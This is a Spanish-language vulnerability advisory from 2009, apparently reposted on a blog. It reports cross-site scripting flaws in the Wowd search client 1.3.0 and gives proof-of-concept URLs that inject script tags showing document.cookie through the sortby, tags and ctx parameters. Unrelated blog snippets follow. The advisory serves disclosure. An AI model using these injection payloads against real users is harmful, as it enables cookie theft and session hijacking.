##########################################
Wowd search client multiple variable XSS
URL afectada: http://www.wowd.com/
Avisado por: http://lostmon.blogspot.com/2009/10/wowd-search-client-multiple-variable.html
Notificación al vendedor: SÍ exploit disponible: SÍ
##########################################
################
¿Qué es Wowd?
################
Wowd es un motor de búsqueda que sirve para descubrir lo más popular de las webs en tiempo real.
En esencia, la compañía ha hecho un p2p como motor de búsqueda, por lo que otros usuarios Wowd que hay en línea pueden estudiar y usar sitios del ranking basada en una estructura de enlaces arcanos.
Teniendo una búsqueda y dividiéndola en millones de pequeñas piezas todas ellas dirigidas por los usuarios individuales que han descargado el cliente Wowd cambia completamente la operación – y la economía – del motor de búsqueda. Cuantas más veces clicken dentro de Wowd en un enlace dentro de un tiempo “x” el ranking será más alto ya que es mayor el vínculo.
##########################
Descripción de la vulnerabilidad
##########################
El cliente Wowd contiene un error que permite a ejecutar un codigo remoto cross site scripting (XSS). Este error existe porque la aplicación no es valida en el cuadro de diálogo URI ” SortBy ‘tags’ y ‘variables CTX’ en envio a script ‘index.html’. Esto podría permitir a un usuario crear especialmente un código a través de una dirección URL que ejecutaría arbitrariamente en el navegador de un usuario dentro de la relación de confianza entre el navegador y el servidor, esto produciría una pérdida de integridad.
Este problema puede ser peligroso, porque si se está ejecutando el cliente Wowd, usted tiene esta vulnerabilidad, porque este problema puede ser aprovechado en todos los navegadores, hasta en IE8 con el filtro anti-XSS (WoW!)
#################
Versiones
################·
Wowd client 1.3.0
#################
SOLUCIÓN
#################
No hay solución por el momento !!!
###################
PoC
###################
#############
Prueba
#############
En todos los casos que el XSS se ejecuta incluso a IE8 con anti-XSS
un usuario remoto puede redactar un documento html con un iframe y esta fuente para el iframe:
http://localhost:8101/wowd/index.html?search&sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
de forma adicional Wowd puede mostrar sus resultados, ya que tenemos una funcionalidad para agregar “etiquetas” a una dirección URL.
Ejemplo:
http://localhost:8101/wowd/index.html?search&query=a&
sortby=rank&tags=english|S0B0707656E676C6973680D02
Esto muestra una búsqueda indexada con la etiqueta ‘english’, se puede añadir una etiqueta diseñada por tí mismo que permita la ejecución de un XSS como: [tag]|[token]
ejemplo:
http://localhost:8101/wowd/index.html?search&query=a
&sortby=rank&tags=english|S0B0707656E676C6973680D02,
%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02
CTX se vé también variablemente afectado
http://localhost:8101/wowd/index.html?search&page=2&q=
&sortby=rank&tags=news|S0807046E6577730D02&ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
############## €nd ###################
Thnx To estrella to be my light
Thnx to all Lostmon Team !
–
atentamente:
Lostmon (lostmon@gmail.com)
——–
Browser: Internet Explorer 8 (Windows)
Browser: Firefox 3.5 (Windows)
Browser: Safari 4 (Windows)
———-
thz Lost
La red de redes no es un paraíso digital ni mucho menos, como todo en esta vida tiene partes buenas y partes “menos buenas”. Seguro que todos los lectores podrían indicar fácilmente unas cuantas cosas que no les gustan de la Internet actual.





Telefónica prepara una nueva duplicación de velocidad del ADSL para estas Navidades. El aumento será posible gracias al uso de VDSL2 desde las centrales, que permite extender el rango de usuarios que pueden sincronizar a más velocidad. La operadora tratará así de hacer más apetecible su ADSL sin tener que tocar el precio.

Una nueva vulnerabilidad ha sido reportada en Apache ODE en la pagina de seguridad informática 










Comentarios recientes